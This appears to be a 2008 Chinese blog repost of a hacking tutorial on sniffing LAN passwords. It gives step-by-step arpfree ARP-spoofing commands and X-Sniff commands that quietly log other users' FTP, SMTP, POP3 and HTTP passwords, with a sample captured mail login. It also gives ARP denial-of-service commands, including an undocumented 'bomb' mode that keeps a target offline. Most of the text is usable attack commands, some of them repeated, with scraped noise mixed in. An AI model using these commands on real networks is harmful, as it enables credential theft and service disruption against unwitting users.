Posted on 2008-09-13 19:07
freedoom 閱讀(1846)
評(píng)論(0) 編輯 收藏 所屬分類(lèi):
hacker
arpfree + xsniff嗅探局域網(wǎng)密碼
試驗(yàn)環(huán)境:
一臺(tái)八口共享上網(wǎng)路由器,接八臺(tái)電腦 !在其中一臺(tái)機(jī)器上嗅探密碼
Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間
步驟如下:
Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間 LE MB&kr0`
1,首先ping 192.168.0.1 網(wǎng)關(guān),然后用arp -a 獲得網(wǎng)關(guān)Mac地址 0000ea0123de
Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間
2,使用arpfree欺騙網(wǎng)關(guān),讓它將其他機(jī)器發(fā)向網(wǎng)關(guān)的包發(fā)給嗅探主機(jī)
命令如下:
Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間pgR4K wO,tG/H
arpfree 0000ea0123de 123412341234 request 1.1.1.1
3,啟動(dòng)sniff開(kāi)始嗅探
命令如下:
xsniff -pass -hide -log pass.log
4,打開(kāi)pass.log就能察看嗅探到的密碼!
示例:
TCP [05/10/06 22:17:40]
192.168.0.8->202.108.9.77 Port: 1158->80
HOST: mail.163.com USER: 1111111, PASS: 1111111
Arpfree + X-Sniff嗅探局域網(wǎng)密碼
游泳的魚(yú) 發(fā)表于 2008-1-14 15:48:00 |
ARP簡(jiǎn)介:
要使用ARP欺騙,必須啟動(dòng)ip路由功能,修改(添加)注冊(cè)表選項(xiàng):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
發(fā)送ARP報(bào)文的軟件,可以發(fā)送任意 源,目的 地址的ARP報(bào)文,可以結(jié)合Sniffer做不少的事~不用老在Sniffer里做ARP包了~
不過(guò)要安裝WinPacp 3.0驅(qū)動(dòng)先...
發(fā)送的時(shí)候可以選擇ARP的TYPE。如果是ARP請(qǐng)求報(bào)文,則只要輸入要訪問(wèn)的IP地址。
如果是ARP應(yīng)答報(bào)文則要輸入發(fā)送端的IP以及對(duì)方詢(xún)問(wèn)MAC地址對(duì)應(yīng)的IP地址
最后的發(fā)送速度可選參數(shù)為:(大小寫(xiě)敏感..我覺(jué)得挺不好的)
fast---------最快
hear---------每60ms一個(gè)包(可能是比較適合結(jié)合Sniffer做監(jiān)聽(tīng))
slowhear-----每500ms一個(gè)包
auto---------每1秒一個(gè)包
slow---------每2秒個(gè)包
使用方法如下:
***********************************************************************
(1)Send arp packet in "request mode" Examples:
arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
| | | | |
你的網(wǎng)卡地址 | | | |
對(duì)方網(wǎng)卡地址 | | 速度
arp方式 |
|
你的IP地址
***********************************************************************
(2)Send arp packet in "reply mode" Examples:
arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
| | | | | |
你的網(wǎng)卡地址 | | | | |
對(duì)方網(wǎng)卡地址 | | | 速度
arp方式 | |
| |
你的IP地址 |
|
對(duì)方IP地址
***********************************************************************
反擊“Lan終結(jié)者”的辦法:
1:發(fā)動(dòng)比他更強(qiáng)烈的攻擊:
arpfree 0050fc272b26 ffffffffffff request 1.1.1.1 fast
| | | | |
你的網(wǎng)卡地址 | | | |
對(duì)方網(wǎng)卡地址 | | 速度
arp方式 |
|
你的IP地址
2:交換機(jī)競(jìng)爭(zhēng):
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
| | | | |
你的網(wǎng)卡地址 | | | |
你想攻擊的人的網(wǎng)卡地址 | | 速度
arp方式 |
|
你的IP地址
方法1將導(dǎo)致他IP地址沖突(比“終結(jié)者”來(lái)的猛烈多了)
方法2將使得他無(wú)法連接網(wǎng)絡(luò)(由于交換機(jī)把他的流量都給你了)
***********************************************************************
因?yàn)橛信笥逊从吃诜墙粨Q環(huán)境下,如使用HUB的情況下,無(wú)法對(duì)目標(biāo)進(jìn)行打擊
故增加參數(shù)“bomb”,使用方法如下:
假設(shè)目標(biāo)為IP:192.168.237.109 目標(biāo)mac為:011a8575a436
攻擊命令如下:
arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb
其實(shí)就是進(jìn)行簡(jiǎn)單的ARP DOS攻擊,快速刷新目標(biāo)的ARP緩存,可以在消耗自身較少系統(tǒng)資源的情況下
造成和PDOS工具類(lèi)似的效果,并且如果你不停止攻擊,對(duì)方重啟以后也無(wú)法正常進(jìn)入系統(tǒng)
(當(dāng)然前提是他沒(méi)拔網(wǎng)線)。
其實(shí)這樣做是十分不厚道的....所以參數(shù)就沒(méi)有寫(xiě)在程序的 HELP 里面,大家慎用...
=========================================================================
X-Sniff嗅探器
可捕獲局域網(wǎng)內(nèi)FTP/SMTP/POP3/HTTP協(xié)議密碼
參數(shù)說(shuō)明
-tcp 輸出TCP數(shù)據(jù)報(bào)
-udp 輸出UDP數(shù)據(jù)報(bào)
-icmp 輸出ICMP數(shù)據(jù)報(bào)
-pass 過(guò)濾密碼信息
-hide 后臺(tái)運(yùn)行
-host 解析主機(jī)名
-addr IP地址 過(guò)濾IP地址
-port 端口 過(guò)濾端口
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進(jìn)制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 后臺(tái)運(yùn)行嗅探密碼并將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過(guò)濾tcp和udp信息并以ASCII格式輸出.
==========================================================================
實(shí)驗(yàn)開(kāi)始...
試驗(yàn)環(huán)境:
一臺(tái)八口共享上網(wǎng)路由器,接八臺(tái)電腦,在其中一臺(tái)機(jī)器上嗅探密碼
步驟如下:
1.首先ping 192.168.0.1 網(wǎng)關(guān),然后用arp -a 獲得網(wǎng)關(guān)Mac地址 0000ea0123de
2.使用arpfree欺騙網(wǎng)關(guān),讓它將其他機(jī)器發(fā)向網(wǎng)關(guān)的包發(fā)給嗅探主機(jī) 命令如下:
arpfree 0000ea0123de 123412341234 request 1.1.1.1 hear
3.啟動(dòng)X-Sniff開(kāi)始嗅探 命令如下:
xsniff -pass -hide -log pass.log
4.打開(kāi)pass.log就能察看嗅探到的密碼!
示例:
TCP [05/10/06 22:17:40]
192.168.0.8->202.108.9.77 Port: 1158->80
HOST: mail.163.com USER: 1111111, PASS: 1111111
|
|
如果是非交換環(huán)境,可省略1,2步。
面提到的xsniff.exe 十分小巧,但是功能強(qiáng)大,呵呵呵!
0使用說(shuō)明 請(qǐng)看下面的
可捕獲局域網(wǎng)內(nèi)FTP/SMTP/POP3/HTTP協(xié)議密碼
參數(shù)說(shuō)明
輸出TCP數(shù)據(jù)報(bào)
-udp 輸出UDP數(shù)據(jù)報(bào)
-icmp 輸出ICMP數(shù)據(jù)報(bào)
-pass 過(guò)濾密碼信息
-hide 后臺(tái)運(yùn)行
-host 解析主機(jī)名
-addr IP地址 過(guò)濾IP地址
-port 端口 過(guò)濾端口
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進(jìn)制形式輸出
Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間!E x"vM/LEu
用法示例
xsniff.exe -pass -hide -log pass.log 后臺(tái)運(yùn)行嗅探密碼并將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過(guò)濾tcp和udp信息并以ASCII格式輸出.
上面提到的arpfree工具使用說(shuō)明請(qǐng)看 url]http://www.netexpert.cn/viewthread.php?tid=550[/url]
Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間Zw+^9GqCZ
Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間0K:Tz#@O)A0cc
[
本帖最后由 diker 于 2006-5-11 12:14 編輯 ]
Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間t,[$BWSmu:Y